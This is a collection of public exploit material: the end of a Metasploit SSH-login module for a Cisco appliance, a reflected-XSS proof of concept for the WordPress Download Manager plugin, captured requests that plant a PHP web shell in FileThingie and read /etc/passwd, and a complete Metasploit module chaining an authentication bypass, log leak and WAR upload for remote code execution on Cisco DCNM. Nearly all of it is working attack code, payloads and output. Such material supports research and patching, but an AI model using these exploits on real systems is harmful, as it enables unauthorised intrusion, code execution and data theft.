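    rescue Net::SSH::Exception => e
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
      return nil
    end

    return nil unless ssh

    # The CommandStream takes ownership of the session from here on; nothing in
    # this method should close it.
    Net::SSH::CommandStream.new(ssh)
  end

  # Log in with the configured credentials and hand the session to the
  # payload handler.
  def exploit
    user = datastore['USERNAME']
    pass = datastore['PASSWORD']

    print_status("#{rhost}:#{rport} - Attempt to login to the Cisco appliance...")
    conn = do_login(user, pass)
    return unless conn

    print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})")
    handler(conn.lsock)
  end
end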
* Exploit Title: WordPress Download Manager Cross-site Scripting
* Discovery Date: 2019-04-13
* Exploit Author: ThuraMoeMyint
* Author Link: https://twitter.com/mgthuramoemyint
* Vendor Homepage: https://www.wpdownloadmanager.com
* Software Link: https://wordpress.org/plugins/download-manager
* Version: 2.9.93
* Category: WebApps, WordPress
CVE:CVE-2019-15889
Description
--
In the Pro features of the WordPress Download Manager plugin, the
Category Short-code feature sorts categories through an `orderby` query
parameter (e.g. `?orderby=title,publish_date`). The parameter value is
reflected into the `href` attribute of the generated "Asc"/"Desc" sort
links without output encoding, so appending `">` to it closes the
attribute and any XSS payload that follows is rendered and executed.
To reproduce:
1. Open a page whose sort links are built from `?orderby`.
2. Append `">` to the `orderby` value, followed by a simple payload such as `<script>alert(1)</script>`.
3. The payload executes in the browser of whoever opens the link (reflected XSS).
--
PoC
--
<div class="btn-group btn-group-sm pull-right"><button type="button"
class="btn btn-primary" disabled="disabled">Order </button><a
class="btn btn-primary"
href="https://server/wpdmpro/category-short-code/?orderby=publish_date\"><script>alert(11)</script>&order=asc">Asc</a><a
class="btn btn-primary"
href="https://server/wpdmpro/category-short-code/?orderby=publish_date\"><script>alert(11)</script>&order=desc">Desc</a></div>
--
Demo
--
https://server/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc
--
Another reflected cross-site scripting issue exists in the advanced search form, via the `search[publish_date]` parameter:
https://server/wpdmpro/advanced-search/
https://server/wpdmpro/advanced-search/?search[publish_date]=2019-04-17+to+2019-04-17%22%3E%3Cscript%3Ealert(1)%3C/script%3E&search[update_date]=&search[view_count]=&search[download_count]=&search[package_size]=&search[order_by]=&search[order]=ASC&q=a
# Exploit Title: FileThingie 2.5.7 - Arbitrary File Upload
# Author: Cakes
# Discovery Date: 2019-09-03
# Vendor Homepage: www.solitude.dk/filethingie
# Software Link: https://github.com/leefish/filethingie/archive/master.zip
# Tested Version: 2.5.7
# Tested on OS: CentOS 7
# CVE: N/A
# Intro:
# FileThingie lets a user upload a .zip archive and then extract it server-side (act=unzip) into a web-served
# folder. Archive contents are not filtered, so a PHP web shell inside the archive is written under
# /filethingy/folders/<dir>/ and can be executed by requesting it directly, giving remote code execution as the
# web server user. Note that the captured requests below carry a session cookie, so this appears to require an
# authenticated FileThingie session rather than an anonymous upload.
::::: POST .zip file with cmd shell
POST /filethingy/ft2.php HTTP/1.1
Host: 10.0.0.21
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.21/filethingy/ft2.php?dir=/tester
Content-Type: multipart/form-data; boundary=---------------------------3402520321248020588131184034
Content-Length: 1117
Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
-----------------------------3402520321248020588131184034
Content-Disposition: form-data; name="localfile-1567531192592"; filename=""
Content-Type: application/octet-stream
-----------------------------3402520321248020588131184034
Content-Disposition: form-data; name="MAX_FILE_SIZE"
2000000
-----------------------------3402520321248020588131184034
Content-Disposition: form-data; name="localfile"; filename="cmdshell.zip"
Content-Type: application/zip
PK š#O $ cmdshell.phpUT
۟n]۟n]۟n]ux ³±/È(P(ÃŽHÃɉOÂHMÖP‰ww
‰VOÃŽMQÂÕ´VP°·ã PKý(tÃ…& $ PK š#Oý(tÃ…& $ ¤ cmdshell.phpUT
۟n]۟n]۟n]ux PK Z €
-----------------------------3402520321248020588131184034
Content-Disposition: form-data; name="act"
upload
-----------------------------3402520321248020588131184034
Content-Disposition: form-data; name="dir"
/tester
-----------------------------3402520321248020588131184034
Content-Disposition: form-data; name="submit"
Upload
-----------------------------3402520321248020588131184034--
:::::::::::::::::::::::::::::Unzip Malicious file
POST /filethingy/ft2.php HTTP/1.1
Host: 10.0.0.21
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.21/filethingy/ft2.php?dir=/tester
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
newvalue=cmdshell.zip&file=cmdshell.zip&dir=%2Ftester&act=unzip
::::::::::::::::::::::::::::::Access your shell
GET /filethingy/folders/tester/cmdshell.php?cmd=whoami HTTP/1.1
Host: 10.0.0.21
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
Cache-Control: max-age=0
::::::::::::::::::::::::::::::Read /etc/passwd
GET /filethingy/folders/tester/cmdshell.php?cmd=cat%20/etc/passwd HTTP/1.1
Host: 10.0.0.21
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
HTTP/1.1 200 OK
Date: Tue, 03 Sep 2019 17:38:04 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 1738
Connection: close
Content-Type: text/html; charset=UTF-8
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
misdn:x:31:31:Modular ISDN:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/sbin/nologin
mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
saslauth:x:998:76:Saslauthd user:/run/saslauthd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
uucp:x:10:14:Uucp user:/var/spool/uucp:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
dhcpd:x:177:177:DHCP server:/:/sbin/nologin
asterisk:x:997:994:Asterisk PBX:/var/lib/asterisk:/bin/bash
spamfilter:x:1000:1000::/home/spamfilter:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
chrony:x:996:993::/var/lib/chrony:/sbin/nologin
cakes:x:1001:1001:cakes:/home/cakes:/bin/bash
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
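class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  # Cisco DCNM: arbitrary WAR upload through /fm/fileUpload (CVE-2019-1620),
  # chained with the authentication bypass in /fm/pmreport (CVE-2019-1619,
  # 10.4(2) and below) and the unauthenticated log download at
  # /fm/log/fmlogs.zip (CVE-2019-1622), which leaks the JBoss deployment
  # directory the WAR has to be written to. Only 11.0(1) needs credentials.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Cisco Data Center Network Manager Unauthenticated Remote Code Execution',
      'Description'    => %q{
        DCNM exposes a file upload servlet (FileUploadServlet) at /fm/fileUpload.
        An authenticated user can abuse this servlet to upload a WAR to the Apache Tomcat webapps
        directory and achieve remote code execution as root.
        This module exploits two other vulnerabilities, CVE-2019-1619 for authentication bypass on
        versions 10.4(2) and below, and CVE-2019-1622 (information disclosure) to obtain the correct
        directory for the WAR file upload.
        This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), and should
        work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit
        (see References to understand why).
      },
      'Author'         =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2019-1619' ], # auth bypass
          [ 'CVE', '2019-1620' ], # file upload
          [ 'CVE', '2019-1622' ], # log download
          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass' ],
          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex' ],
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/cisco_dcnm_upload_2019.rb' ],
          [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jul/7' ]
        ],
      'Platform'       => 'java',
      'Arch'           => ARCH_JAVA,
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [ 'Cisco DCNM 11.1(1)', {} ],
          [ 'Cisco DCNM 11.0(1)', {} ],
          [ 'Cisco DCNM 10.4(2)', {} ]
        ],
      'Privileged'     => true,
      'DefaultOptions' => { 'WfsDelay' => 10 },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jun 26 2019'
    ))

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Connect with TLS', true]),
        OptString.new('TARGETURI', [true, "Default server path", '/']),
        OptString.new('USERNAME', [true, "Username for auth (required only for 11.0(1) and above", 'admin']),
        OptString.new('PASSWORD', [true, "Password for auth (required only for 11.0(1) and above", 'admin']),
      ])
  end

  # Fingerprint: both the pmreport and fileUpload servlets answer 500 when hit
  # without their expected parameters. This is a weak signal (any other 500
  # would match), hence Detected rather than Appears.
  def check
    res = send_request_cgi(
      'uri'      => normalize_uri(target_uri.path, 'fm', 'pmreport'),
      'method'   => 'GET',
      'vars_get' => { 'token' => rand_text_alpha(5..20) }
    )
    return CheckCode::Unknown unless res && res.code == 500

    res = send_request_cgi(
      'uri'    => normalize_uri(target_uri.path, 'fm', 'fileUpload'),
      'method' => 'GET'
    )
    return CheckCode::Unknown unless res && res.code == 500

    CheckCode::Detected
  end

  # Resolve the 'Automatic' target from /fm/fmrest/about/version. An explicit
  # target is returned untouched. Unrecognised versions fall back to the
  # 10.4(2) target, i.e. the auth bypass is assumed to work.
  #
  # @return [Msf::Module::Target]
  def target_select
    return target unless target == targets[0]

    res = send_request_cgi(
      'uri'    => normalize_uri(target_uri.path, 'fm', 'fmrest', 'about', 'version'),
      'method' => 'GET'
    )
    fail_with(Failure::NoTarget, "#{peer} - Failed to determine target") unless res && res.code == 200

    body = res.body
    if body.include?('version":"11.1(1)')
      print_good("#{peer} - Detected DCNM 11.1(1)")
      print_status("#{peer} - No authentication required, ready to exploit!")
      targets[1]
    elsif body.include?('version":"11.0(1)')
      print_good("#{peer} - Detected DCNM 11.0(1)")
      print_status("#{peer} - Note that 11.0(1) requires valid authentication credentials to exploit")
      targets[2]
    elsif body.include?('version":"10.4(2)')
      print_good("#{peer} - Detected DCNM 10.4(2)")
      print_status("#{peer} - No authentication required, ready to exploit!")
      targets[3]
    else
      print_error("#{peer} - Failed to detect target version.")
      print_error("Please contact module author or add the target yourself and submit a PR to the Metasploit project!")
      print_error(body)
      print_status("#{peer} - We will proceed assuming the version is below 10.4(2) and vulnerable to auth bypass")
      targets[3]
    end
  end

  # 11.0(1): credentials are accepted in the query string of /fm/ and the
  # server answers with an authenticated JSESSIONID.
  #
  # @return [String, nil] the JSESSIONID cookie fragment, or nil if no 200 /
  #   no such cookie came back
  def auth_v11
    res = send_request_cgi(
      'uri'      => normalize_uri(target_uri.path, 'fm/'),
      'method'   => 'GET',
      'vars_get' =>
        {
          'userName' => datastore['USERNAME'],
          'password' => datastore['PASSWORD']
        }
    )
    return nil unless res && res.code == 200

    cookies = res.get_cookies
    return nil if cookies.nil? || cookies.empty?

    cookies.split(';').find { |cok| cok.include?("JSESSIONID") }
  end

  # 10.4(2) and below, CVE-2019-1619: the pmreport servlet trusts a token of
  # the form sessionId.sysTime.md5.username, where md5 is computed over
  # username + sessionId + sysTime + a static secret. sysTime has to match the
  # server clock, so it is taken from the Date header of a first request, and
  # the anonymous JSESSIONID from that request is the one that gets promoted.
  #
  # @return [String, nil] the now-admin JSESSIONID cookie, or nil on failure
  def auth_v10
    # step 1: get a JSESSIONID cookie and the server Date header
    res = send_request_cgi(
      'uri'    => normalize_uri(target_uri.path, 'fm/'),
      'method' => 'GET'
    )
    return nil unless res && res.headers['Date']

    cookies = res.get_cookies
    if cookies.nil? || cookies.empty?
      print_error("#{peer} - Server did not hand out a session cookie")
      return nil
    end
    jsession = cookies.split(';')[0]

    # step 2: convert the Date header to epoch milliseconds and build the hash
    begin
      server_date = Time.httpdate(res.headers['Date']).to_i * 1000
    rescue ArgumentError
      print_error("#{peer} - Could not parse Date header: #{res.headers['Date']}")
      return nil
    end
    print_good("#{peer} - Got sysTime value #{server_date}")

    session_id = rand(1000..50000).to_s
    # auth hash format:
    # username + sessionId + sysTime + POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF
    md5 = Digest::MD5.digest 'admin' + session_id + server_date.to_s +
      "POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF"
    md5_str = Base64.strict_encode64(md5)

    # step 3: authenticate our cookie as admin
    # token format: sessionId.sysTime.md5_str.username
    res = send_request_cgi(
      'uri'      => normalize_uri(target_uri.path, 'fm', 'pmreport'),
      'cookie'   => jsession,
      'vars_get' => { 'token' => "#{session_id}.#{server_date}.#{md5_str}.admin" },
      'method'   => 'GET'
    )
    # A 500 means the token was accepted and the servlet failed later on the
    # missing report parameters; anything else means the bypass did not take.
    return nil unless res && res.code == 500

    jsession
  end

  # CVE-2019-1622: /fm/log/fmlogs.zip is served without authentication. The
  # jboss*.log inside records the FileSystemDeploymentService directory, which
  # is where a dropped WAR gets auto-deployed.
  #
  # @return [String, nil] the deployment directory, or nil if the archive or
  #   the log line could not be obtained
  def get_war_path
    res = send_request_cgi(
      'uri'    => normalize_uri(target_uri.path, 'fm', 'log', 'fmlogs.zip'),
      'method' => 'GET'
    )
    return nil unless res && res.code == 200

    # rubyzip needs a seekable file here: reading the archive from an
    # InputStream raises Zip::GPFBit3Error.
    tmp = Tempfile.new
    begin
      File.binwrite(tmp.path, res.body)
      Zip::File.open(tmp.path) do |zis|
        zis.each do |entry|
          next unless entry.name =~ /jboss[0-9]*\.log/
          fdata = zis.read(entry)
          if fdata[/Started FileSystemDeploymentService for directory ([\w\/\\\-\.:]*)/]
            return Regexp.last_match(1).strip
          end
        end
      end
      nil
    ensure
      # Remove the temp file on every path; the original only did so when the
      # log line matched and leaked the file otherwise.
      tmp.close
      tmp.unlink
    end
  end

  # Authenticate as the chosen target requires, find the deployment
  # directory, upload a WAR payload there and trigger it.
  def exploit
    tgt = target_select

    jsession = nil
    if tgt == targets[2]
      jsession = auth_v11
    elsif tgt == targets[3]
      jsession = auth_v10
    end

    # targets[1] DCNM 11.1(1) doesn't need auth!
    unless tgt == targets[1]
      fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate JSESSIONID cookie") if jsession.nil?
      print_good("#{peer} - Successfully authenticated our JSESSIONID cookie")
    end

    war_path = get_war_path
    if war_path.nil? || war_path.empty?
      fail_with(Failure::Unknown, "#{peer} - Failed to get WAR path from logs")
    end
    print_good("#{peer} - Obtain WAR path from logs: #{war_path}")

    # Generate our payload... and upload it
    app_base    = rand_text_alphanumeric(6..16)
    fname       = "#{app_base}.war"
    war_payload = payload.encoded_war({ :app_name => app_base }).to_s

    post_data = Rex::MIME::Message.new
    post_data.add_part(fname, nil, nil, "form-data; name=\"fname\"")
    post_data.add_part(war_path, nil, nil, "form-data; name=\"uploadDir\"")
    post_data.add_part(war_payload,
                       "application/octet-stream", 'binary',
                       "form-data; name=\"#{rand_text_alpha(5..20)}\"; filename=\"#{rand_text_alpha(6..10)}\"")

    print_status("#{peer} - Uploading payload...")
    res = send_request_cgi(
      'uri'    => normalize_uri(target_uri.path, 'fm', 'fileUpload'),
      'method' => 'POST',
      'data'   => post_data.to_s,
      'cookie' => jsession,
      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}"
    )
    unless res && res.code == 200 && res.body.include?(fname)
      fail_with(Failure::Unknown, "#{peer} - Failed to upload WAR file")
    end

    # NOTE(review): FileDropper is mixed in but nothing is registered for
    # cleanup, so the uploaded WAR (presumably war_path/fname) is left on the
    # appliance after the session closes - confirm the on-disk path before
    # wiring up register_files_for_cleanup.
    print_good("#{peer} - WAR uploaded, waiting a few seconds for deployment...")
    sleep 10

    print_status("#{peer} - Executing payload...")
    send_request_cgi(
      'uri'    => normalize_uri(target_uri.path, app_base),
      'method' => 'GET'
    )
  end
end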